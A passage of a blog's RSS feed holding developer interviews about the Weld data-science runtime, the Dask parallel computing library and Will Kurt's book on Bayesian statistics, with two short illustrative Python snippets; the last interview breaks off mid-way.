&lt;p&gt;After working for weeks with Python’s and R’s data science stacks, I started to ask myself if there could be a common intermediate representation, similar to CUDA, that could be used by many languages. There should be something better than reimplementing and optimizing the same methods in each language. In addition, having a common runtime that could optimize the whole program, instead of each function separately, would be better. After a few days of researching and testing different projects I found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.weld.rs&#x2F;&quot;&gt;Weld&lt;&#x2F;a&gt; (you can also read its &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cs.stanford.edu&#x2F;~matei&#x2F;papers&#x2F;2017&#x2F;cidr_weld.pdf&quot;&gt;paper&lt;&#x2F;a&gt;). To my surprise, one of the creators of Weld is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;matei_zaharia&quot;&gt;Matei Zaharia&lt;&#x2F;a&gt;, who is also the creator of Spark.&lt;&#x2F;p&gt;
&lt;p&gt;That is how I contacted and interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;shoumik.xyz&#x2F;&quot;&gt;Shoumik Palkar&lt;&#x2F;a&gt;, the main contributor to Weld. Shoumik is a Ph.D. student in the Computer Science department at Stanford University, advised by Matei Zaharia.&lt;&#x2F;p&gt;
&lt;p&gt;Weld is far from being production ready but it is promising. If you are interested in the future of data science and in Rust, you will like this interview.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-hqC6KtF-l1RN8uDg99rmow.png&quot; alt=&quot;&quot; &#x2F;&gt;Not a Monad Tutorial’s new logo!&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;What was the motivation to develop Weld and what problems does it solve?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The motivation behind Weld is to provide bare-metal performance for applications that rely on existing high-level APIs such as NumPy and Pandas. The main problem it solves is enabling cross-function and cross-library optimizations that other libraries today don’t provide. In particular, many commonly used libraries provide state-of-the-art implementations for algorithms on a per-function basis (e.g., a fast join algorithm implemented in C in Pandas, or a fast matrix multiply in NumPy), but do not provide any facility for enabling optimization across these functions (e.g., preventing unnecessary scans of memory when performing a matrix multiply followed by an aggregation). Weld provides a common runtime that enables libraries to express computations in a common IR; that IR can then be optimized using a compiler optimizer, and can then be JIT’d to parallel native machine code with optimizations such as loop fusion, vectorization, etc. Weld’s IR is natively parallel, so programs expressed in it can always be trivially parallelized.&lt;&#x2F;p&gt;
&lt;p&gt;We also have a new project called split annotations which will integrate with Weld that’s meant to lower the barrier for enabling these optimizations in existing libraries.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Wouldn’t it be easier to optimize numpy, pandas and scikit directly? How much faster is Weld?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Weld provides optimizations across functions in these libraries, whereas optimizing these libraries would only make individual function calls faster. In fact, many of these data libraries are already highly optimized on a per-function basis, but deliver performance below the limits of modern hardware because they do not exploit parallelism or do not make efficient use of the memory hierarchy. For example, many NumPy ndarray functions are already implemented in C, but calling each function requires scanning over each input in its entirety. If these arrays do not fit in the CPU caches, most of the execution time can go into loading data from main memory rather than performing computations. Weld can look across individual function calls and perform optimizations such as loop fusion that will keep data in the CPU caches or registers. These kinds of optimizations can improve performance by over an order of magnitude on multi-core systems, because they enable better scaling.&lt;&#x2F;p&gt;
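&lt;p&gt;A minimal sketch of the loop fusion being described (plain Python for clarity, not Weld’s generated code): the unfused version scans the inputs twice and materializes a temporary array, while the fused version aggregates in a single pass with no temporary.&lt;&#x2F;p&gt;

```python
# Unfused: two passes over the data, like chaining two library calls.
def unfused(a, b):
    tmp = [x * y for x, y in zip(a, b)]   # pass 1: materialize a*b in memory
    return sum(tmp)                        # pass 2: aggregate the temporary

# Fused: one pass, values stay in registers/cache; no temporary array.
def fused(a, b):
    total = 0
    for x, y in zip(a, b):
        total += x * y
    return total

a = list(range(1000))
b = list(range(1000))
assert unfused(a, b) == fused(a, b) == 332833500
```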
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-eheS9p1hxxEPH8Fqo3As8A.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;strong&gt;Prototype integrations of Weld with Spark (top left), NumPy (top right), and TensorFlow (bottom left) show up to 30x improvements over the native framework implementations, with no changes to users’ application code. Cross library optimizations between Pandas and NumPy (bottom right) can improve performance by up to two orders of magnitude.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is Baloo?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Baloo is a library that implements a subset of the Pandas API using Weld. It was developed by Radu Jica, who was a Master’s student in CWI in Amsterdam. The goal of Baloo is to provide the kinds of optimizations described above in Pandas to improve its single-threaded performance, reduce memory usage, and to enable parallelism.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Does Weld&#x2F;Baloo support out-of-core operations (say, like Dask) to handle data that does not fit in memory?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Weld and Baloo currently do not support out-of-core operations, though we’d love open source contributions on this kind of work!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you choose Rust and LLVM to implement weld? Was Rust your first choice?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We chose Rust because:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;It has a very minimal runtime (essentially just bounds checks on arrays) and is easy to embed into other languages such as Java and Python&lt;&#x2F;li&gt;
&lt;li&gt;It contains functional programming constructs, such as pattern matching, that make writing compiler code (for example, pattern-matching optimization rules) easier&lt;&#x2F;li&gt;
&lt;li&gt;It has a great community and high quality packages (called “crates” in Rust) that made developing our system easier.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;We chose LLVM because it’s an open-source compiler framework that has wide use and support; we generate LLVM directly instead of C&#x2F;C++ so we don’t need to rely on the existence of a C compiler, and because it improves compilation times (we don’t need to parse C&#x2F;C++ code).&lt;&#x2F;p&gt;
&lt;p&gt;Rust was not the first language in which Weld was implemented; the first implementation was in Scala, which was chosen because of its algebraic data types and powerful pattern matching. This made writing the optimizer, which is the core part of the compiler, very easy. Our original optimizer was based on the design of Catalyst, which is Spark SQL’s extensible optimizer. We moved away from Scala because it was too difficult to embed a JVM-based language into other runtimes and languages.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;If Weld targets CPU and GPUS how does it compare to projects like RAPIDS that implements python data science libraries but for the GPU?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The main way Weld differs from systems such as RAPIDS is that it focuses on optimizing applications across individually written kernels by JIT compiling code rather than providing optimized implementations of individual functions. For example, Weld’s GPU backend would JIT-compile a single CUDA kernel optimized for the end-to-end application on the fly rather than calling existing individual kernels. In addition, Weld’s IR is meant to be hardware independent, allowing it to target GPUs as well as CPUs or custom hardware such as vector accelerators. Of course, Weld overlaps significantly with, and is influenced by, many other projects in the same space, including RAPIDS. Runtimes such as Bohrium (a lazily evaluated NumPy) and Numba (a Python library that enables JIT compilation of numerical code) both share Weld’s high-level goals, while optimizer frameworks such as Spark SQL’s have directly impacted Weld’s optimizer design.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Does weld have other applications outside data science library optimizations?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;One of the most exciting aspects of Weld’s IR is that it supports data parallelism natively. This means that loops expressed in the Weld IR are always safe to parallelize. This makes Weld an attractive IR for targeting new kinds of hardware. For example, collaborators at NEC have demonstrated that they can use Weld to run Python workloads on a custom high-memory-bandwidth vector accelerator just by adding a new backend to the existing Weld IR. The IR can also be used to implement the physical execution layer in a database, and we plan to add features that will make it possible to compile a subset of Python to Weld code as well.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Are the libraries ready to be used on real-life projects? If not, when can we expect them to be ready?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Many of the examples and benchmarks we’ve tested these libraries on are taken from real workloads, so we’d love it if users tried out the current versions for their own applications, provided feedback, and (best of all) submitted open source patches. That said, we don’t expect everything to work out of the box on real-life applications just yet. Our next few releases over the following couple months are focusing exclusively on usability and robustness of the Python libraries; our goal is to make the libraries good enough for inclusion in real-life projects, and to seamlessly fall back to the non-Weld versions of the libraries in places where support is yet to be added.&lt;&#x2F;p&gt;
&lt;p&gt;As I mentioned on the first answer, one path toward making this easier comes in the form of a related project called split annotations (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;weld-project&#x2F;split-annotations&quot;&gt;code&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;shoumik.xyz&#x2F;static&#x2F;papers&#x2F;mozart-sosp19final.pdf&quot;&gt;academic paper&lt;&#x2F;a&gt;). Split annotations are a system that allow annotating existing code to define how to split, pipeline, and parallelize it. They provide the optimization that we found was most impactful in Weld (keeping chunks of data in the CPU caches between function calls rather than scanning over the entire dataset), but they are significantly easier to integrate than Weld because they reuse existing library code rather than relying on a compiler IR. This also makes them easier to maintain and debug, which in turn improves their robustness. Libraries without full Weld support can fall back to split annotations when Weld is not supported, which will allow us to incrementally add Weld support based on feedback from users while still enabling some new optimizations.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Dask’s creator: Scale your Python from one computer to a thousand</title>
          <pubDate>Tue, 03 Sep 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-dasks-creator-scale-your-python-from-one-computer-to-a-thousand/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-dasks-creator-scale-your-python-from-one-computer-to-a-thousand/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-dasks-creator-scale-your-python-from-one-computer-to-a-thousand/">&lt;p&gt;My love for building distributed systems with Erlang, databases, and fetching huge volumes of data still lives on. But nowadays I want better theoretical and practical tools to understand the data. That is why I have been seriously studying probability and statistics, and getting better at Python, numpy, pandas, scikit-learn, scipy and R. If you have read my earlier interviews you are probably aware of this.&lt;&#x2F;p&gt;
&lt;p&gt;That is why I decided to interview Dask’s creator Matthew Rocklin. Dask is a great bridge between the two areas that we specialize in at my company &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lambdaclass.com&#x2F;&quot;&gt;LambdaClass&lt;&#x2F;a&gt;: distributed systems and data science. Dask is a great tool for parallelizing Python libraries. When you have some spare time I highly recommend checking out its code. Meanwhile, I leave you with Matthew’s answers.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;What is Dask? Why did you create it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Dask is a Python library designed to parallelize other common Python libraries, like NumPy, Pandas, Scikit-Learn and others. It helps people use Python on either a single multi-core machine, or a large distributed cluster.&lt;&#x2F;p&gt;
&lt;p&gt;People tend to use it either as a “Big Pandas” or “Big NumPy”, or as a lower level library to build their own parallel systems.&lt;&#x2F;p&gt;
&lt;p&gt;Originally we created Dask to parallelize Numpy and Pandas. We quickly found that the internals of Dask were useful for many more things, so we pivoted to exposing those internals as a generic parallel system.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Are Dask dataframes a full replacement for pandas dataframes?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;No, the Pandas API is &lt;strong&gt;huge&lt;&#x2F;strong&gt;, so a full replacement is nearly impossible.&lt;&#x2F;p&gt;
&lt;p&gt;That being said, Dask Dataframe does implement the vast majority of popularly used Pandas functionality. Common staples like elementwise, reductions, groupbys, joins, rolling, timeseries, and more operations are all there. Additionally, because Dask dataframes are just a bunch of Pandas dataframes spread around a cluster, it’s often pretty easy to convert custom code from Pandas to Dask.&lt;&#x2F;p&gt;
&lt;p&gt;It’s also worth noting that Dask != Dask Dataframes. Dataframes only account for about a third of Dask use out there. Dask goes way beyond just parallelizing Pandas.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is there any downside of using Dask dataframes instead of pandas dataframes?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Oh definitely. If Pandas is solving your problem today, please don’t switch to Dask.&lt;&#x2F;p&gt;
&lt;p&gt;As with any distributed system, Dask adds a lot of complexity like network overheads, function serialization, and longer tracebacks in errors. We do a lot of work to keep our overhead small, both by keeping Dask lightweight and taking care of Python usability, but still, if you don’t need to switch, then don’t.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How is it different from other distributed computation solutions (e.g. Hadoop MapReduce, Spark, Storm, Luigi, Airflow)?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Dask is a bit lower level and more generic than those systems, and so can be used to build up similar solutions using existing Python libraries.&lt;&#x2F;p&gt;
&lt;p&gt;For example:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;When we combine Dask with Pandas we get &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.dask.org&#x2F;en&#x2F;latest&#x2F;dataframe.html&quot;&gt;Dask Dataframes&lt;&#x2F;a&gt;, which are comparable with Spark DataFrames&lt;&#x2F;li&gt;
&lt;li&gt;When we combine Dask with Scikit-Learn we get &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ml.dask.org&quot;&gt;Dask-ML&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;When we combine Dask with Python’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.dask.org&#x2F;en&#x2F;latest&#x2F;futures.html&quot;&gt;futures or async&#x2F;await&lt;&#x2F;a&gt; APIs we get a real-time framework, somewhat similar to Storm&lt;&#x2F;li&gt;
&lt;li&gt;When we combine Dask with &lt;em&gt;cron&lt;&#x2F;em&gt;-like logic, we get an ETL framework like Airflow or Luigi. In fact, some of the Airflow developers split off and made &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.prefect.io&#x2F;&quot;&gt;Prefect&lt;&#x2F;a&gt;, a successor to Airflow that delegates the execution and data movement to Dask&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Additionally, Dask can be combined with other libraries to get novel systems that aren’t in your list. For example:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;When we combine Dask with Numpy we get scalable multi-dimensional &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.dask.org&#x2F;en&#x2F;latest&#x2F;array.html&quot;&gt;Dask Arrays&lt;&#x2F;a&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;When we combine Dask with GPU-accelerated Pandas- or Numpy-like libraries such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;rapids.ai&quot;&gt;RAPIDS&lt;&#x2F;a&gt; we get distributed GPU-accelerated dataframes and arrays.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Internally, Dask has the scalability of a system like MapReduce or Spark, with the flexibility of a system like Luigi or Airflow. This combination is nice when you’re building new systems, and it means that Dask gets used in a ton of novel work.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How does data locality affect the performance of Dask? Does it assume all data is local to workers?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;By data locality you might mean two things (both of which Dask handles well):&lt;&#x2F;p&gt;
&lt;p&gt;1. Where does the data live in some storage system, like S3 or HDFS?&lt;&#x2F;p&gt;
&lt;p&gt;Dask is more than happy to query a data-local storage system like HDFS, find out where all the data lives, and target computations appropriately.&lt;&#x2F;p&gt;
&lt;p&gt;However, this kind of workload is becoming increasingly rare. More often people are using storage systems that prefer global accessibility over data locality, so this matters less and less these days in practice.&lt;&#x2F;p&gt;
&lt;p&gt;2. Once data is in memory, can Dask avoid moving it around?&lt;&#x2F;p&gt;
&lt;p&gt;Dask thinks a lot about where to run computations, and avoiding needless data communication is a big part of this decision. Sometimes we do need to move data around, but yes, Dask certainly avoids this when possible.&lt;&#x2F;p&gt;
&lt;p&gt;Moreover, because Dask gets used with a &lt;strong&gt;wide&lt;&#x2F;strong&gt; variety of workloads, our scheduling heuristics have had to evolve quite a bit over the years. It’s very rare for us to find problems today on which Dask’s data locality heuristics don’t respond optimally.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the biggest Dask cluster you have seen in production?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;One thousand Windows machines.&lt;&#x2F;p&gt;
&lt;p&gt;Dask gets used on some of the world’s largest supercomputers (I was logged into &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.olcf.ornl.gov&#x2F;summit&quot;&gt;Summit&lt;&#x2F;a&gt;, the world’s largest supercomputer, just a few hours ago), and is deployed routinely on all major clouds.&lt;&#x2F;p&gt;
&lt;p&gt;However, Dask also scales down nicely. You can just &lt;em&gt;import dask&lt;&#x2F;em&gt; and run it on a thread pool in a single Python process or Jupyter notebook. As we like to say, &lt;em&gt;“The median cluster size is one”&lt;&#x2F;em&gt;. Dask is pure Python, and super lightweight if it needs to be. You can just &lt;code&gt;pip install dask&lt;&#x2F;code&gt;, and it also ships with the popular Anaconda distribution, which is deployed on millions of machines around the world.&lt;&#x2F;p&gt;
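&lt;p&gt;(A minimal sketch of that single-machine mode, assuming only that &lt;code&gt;dask&lt;&#x2F;code&gt; is installed; the toy functions are invented for illustration.)&lt;&#x2F;p&gt;

```python
# Hypothetical example: Dask on a local thread pool, no cluster required.
import dask

@dask.delayed
def double(x):
    return 2 * x

@dask.delayed
def add(x, y):
    return x + y

# Build a small task graph lazily, then run it on local threads.
total = add(double(10), double(11))
print(total.compute(scheduler="threads"))
```

&lt;p&gt;Nothing here starts a scheduler or workers; the same graph could later be submitted to a distributed cluster unchanged.&lt;&#x2F;p&gt;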
&lt;p&gt;&lt;strong&gt;Were the Dask scheduler and worker architecture, implementation, and protocol inspired by any other project?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The central scheduler + distributed worker architecture is pretty common today. It’s a pragmatic choice for systems that want to scale between 1–1000 nodes.&lt;&#x2F;p&gt;
&lt;p&gt;So sure, Dask was inspired by other projects. All of them :). Notably, Dask tries hard not to reinvent too much. We rely a ton on other infrastructure within the Python ecosystem. We use Tornado and asyncio for concurrency and peer-to-peer networking, Numpy, Pandas, and Scikit-learn for computation, and other Python APIs like concurrent.futures and joblib for user APIs.&lt;&#x2F;p&gt;
&lt;p&gt;Dask is really just a smashing together of Python’s networking stack with its data science stack. Most of the work was already done by the time we got here.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Which are, for you, the most interesting frameworks, tools or libraries implemented on top of Dask, and why?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I’ll list a few interesting frameworks, but there are a ton out there these days:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;xarray.pydata.org&quot;&gt;Xarray&lt;&#x2F;a&gt; is a library commonly used to study Earth system data, like the climate, meteorology, oceanography, satellite imagery, and more. It’s really gratifying to see people use Dask to finally be able to analyze these huge climate science simulations, and help us better understand the planet.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;prefect.io&quot;&gt;Prefect&lt;&#x2F;a&gt; provides a bunch of niceties on top of Dask for common Data Engineering or ETL workloads, similar to Airflow&#x2F;Luigi. We got these feature requests constantly when we were starting out but declared them out of scope. It was great to have another project come by, take that feature set, and implement it way better than we ever could.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;epistasislab.github.io&#x2F;tpot&quot;&gt;TPOT&lt;&#x2F;a&gt; is a library for automatic machine learning. You give it a dataset, and it tries out a bunch of models and pre-processors to find a good model. TPOT existed well before Dask, and it has really gnarly parallelism internally, which makes it hard for non-experts to accelerate. Fortunately the TPOT and Dask developers were able to get this going in a weekend, and now you can scale out this search with Dask on whatever parallel hardware you have.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;rapids.ai&quot;&gt;RAPIDS&lt;&#x2F;a&gt; is a GPU-accelerated data science stack by NVIDIA. They were building out their own fast GPU implementation of Pandas and Numpy and wanted something to solve the multi-node problem for them. Dask was able to step in, handle all of the distributed communication, scheduling, and load balancing, and then step aside while NVIDIA’s fast GPU algorithms took over. (disclaimer, this is my current employer).&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Could you please tell us about the work you are doing at NVIDIA to offload Dask computations to the GPU?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Yeah, RAPIDS is really exciting. It turns out that GPUs are good for things other than graphics and deep learning. They’re surprisingly effective at accelerating more traditional computing in data science (and actual science). Operations like dataframe joins, CSV parsing, FFTs, text processing, and more can often be accelerated 10x-200x. Historically you had to know C and CUDA to use these libraries though, which made them accessible only to somewhat experienced software developers.&lt;&#x2F;p&gt;
&lt;p&gt;The RAPIDS project within NVIDIA is wrapping up all of these algorithms in Python, and exposing APIs to data science users that look like drop-in replacements for Numpy&#x2F;Pandas&#x2F;Scikit-Learn.&lt;&#x2F;p&gt;
&lt;p&gt;They use Dask to provide multi-GPU parallelism (some people have many GPUs in a single machine) and multi-node parallelism across a cluster. Dask’s flexibility, and the fact that it’s pretty unopinionated about what you run as computation, make it the perfect fit. It’s also one of the only task schedulers out there that runs in a non-JVM language, which helps if you use natively compiled code, like CUDA.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you have any book, MOOC or resource that you would recommend to those of us that want to learn more about the implementation of schedulers, concurrency models and distributed systems?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Ha! Sadly no.&lt;&#x2F;p&gt;
&lt;p&gt;Centrally managed distributed schedulers are, unfortunately, not a common topic of research these days. At an academic&#x2F;intellectual level it’s a fairly simple problem. Most of the difficult parts are in the details of engineering, which are unfortunately not that interesting to anyone who isn’t building a distributed scheduler.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Will Kurt on his latest book: Bayesian Statistics The Fun Way</title>
          <pubDate>Tue, 04 Jun 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-will-kurt-on-his-latest-book-bayesian-statistics-the-fun-way/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-will-kurt-on-his-latest-book-bayesian-statistics-the-fun-way/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-will-kurt-on-his-latest-book-bayesian-statistics-the-fun-way/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-LDJcJQMeyOPU9lqAs98JBQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Like most devs, I have a diverse set of interests: functional programming, operating systems, type systems, distributed systems, and data science. That is why I was excited when I learned that &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;willkurt&quot;&gt;Will Kurt&lt;&#x2F;a&gt;, the author of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.manning.com&#x2F;books&#x2F;get-programming-with-haskell&quot;&gt;&lt;em&gt;Get Programming with Haskell&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;, wrote a Bayesian statistics book that is being published by No Starch Press. There aren’t many people who write books on such different topics. I was sure that Will had something interesting to share in this new book. I wasn’t disappointed. The book is an excellent introduction, especially for those of us who have a rough time with advanced math but want to advance in the data science field. I recommend reading it after Think Stats, but before Bayesian Methods for Hackers, Bayesian Analysis with Python and Doing Bayesian Data Analysis.&lt;&#x2F;p&gt;
&lt;p&gt;If you like the interview I recommend that you also read the interviews we did with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;notamonadtutorial.com&#x2F;inteview-with-thomas-wiecki-about-probabilistic-programming-and-pymc-66a12b6f3f2e&quot;&gt;Thomas Wiecki&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;notamonadtutorial.com&#x2F;interview-with-osvaldo-martin-about-bayesian-analysis-with-python-a696b2bce3ba&quot;&gt;Osvaldo Martin&lt;&#x2F;a&gt; about Bayesian analysis and probabilistic programming.&lt;&#x2F;p&gt;
&lt;p&gt;Finally I wanted to thank two members of my team (Pablo Amoroso and Juan Bono) for helping me with the interview.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;1. Why a new statistics book?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Nearly all of the many excellent books on Bayesian statistics out now assume you are either familiar with statistics already or have a pretty solid foundation in programming. Because of this, Bayesian statistics is currently presented mostly as an advanced alternative to classical (i.e. frequentist) statistics. So even though Bayesian statistics is gaining a lot of popularity, it’s mostly among people who already have a quantitative background.&lt;&#x2F;p&gt;
&lt;p&gt;When someone wants to simply “learn statistics” they usually pick up an introduction based on frequentist statistics, end up half understanding a bunch of tests and rules, and feel very confused by the subject. I wanted to write a book on Bayesian statistics that really anyone could pick up and use to gain real intuitions for how to think statistically and solve real problems using statistics. For me there’s no reason why Bayesian statistics can’t be a beginner’s first introduction to statistics.&lt;&#x2F;p&gt;
&lt;p&gt;I would love it if, one day, when people said “statistics” it implied Bayesian statistics, and frequentist statistics was just an academic niche. To get there we need more books that introduce statistics to a wide audience using Bayesian methods and assume this may be the reader’s first exposure to stats. I toyed with the idea of just calling this book “Statistics the Fun Way”, but I know I would probably get angry emails from people buying the book for help with stats 101 and getting very confused! Hopefully this book will be a small step toward getting “stats 101” taught from the Bayesian perspective, so that statistics can make sense from the beginning.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2. Who is your intended audience for the book? Could anyone without a math background pick it up?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;My goal with Bayesian Statistics the Fun Way was to create a book that basically anyone with a high school math background could pick up and read. Even if you only vaguely remember algebra, the book moves at a pace that should be easy to follow. Bayesian statistics does require just a little calculus and is a lot easier with a bit of code, so I’ve included two appendices that cover enough R to work as an advanced calculator and enough background in the ideas of calculus that when the book needs to talk about integrals you can understand. But I promise that there is no solving of any calculus problems required.&lt;&#x2F;p&gt;
&lt;p&gt;While I worked hard to limit the mathematical prerequisites for the book, as you read through it you should start picking up on mathematical ways of thinking. If you really understand the math you’re using, you can make better use of it. So I don’t try to shy away from any of the real math, but rather work up to it slowly so that all the math seems obvious as you develop your understanding. Like many people, I used to believe that math was confusing and difficult to work with. In time I really saw that when math is done right, it should be almost obvious. Confusion in mathematics is usually just the result of moving too quickly, or leaving out important steps in the reasoning.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;3. Why should software developers learn probability and statistics?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I really believe everyone should learn some probability and statistics because it really does help to reason about the uncertain world which is our everyday life. For software developers in particular there are a few common places where it’s useful to understand statistics. It’s pretty likely that at some point in your career in software, you’ll need to write code that makes some decision based on some uncertain measurement. Maybe it’s measuring the conversion rate on a web page, generating some random reward in a game, assigning users to groups randomly or even reading information from an uncertain sensor. In all these cases really understanding probability will be very helpful. In the software part of my career I’ve also found that probability can help a lot in troubleshooting bugs that are difficult to reproduce or to trace back to a complex problem. If a bug appears to be caused by insufficient memory, does adding more memory decrease the probability of the bug in a meaningful way? If there are two explanations for a complex bug, which should be investigated first? In all these cases probability can help. And of course with the rise of Machine Learning and Data Science, engineers are more and more likely to be working on software problems that involve working directly with probabilities.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;4. Could you give a brief summary of the difference between the frequentist and bayesian approaches to probability?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
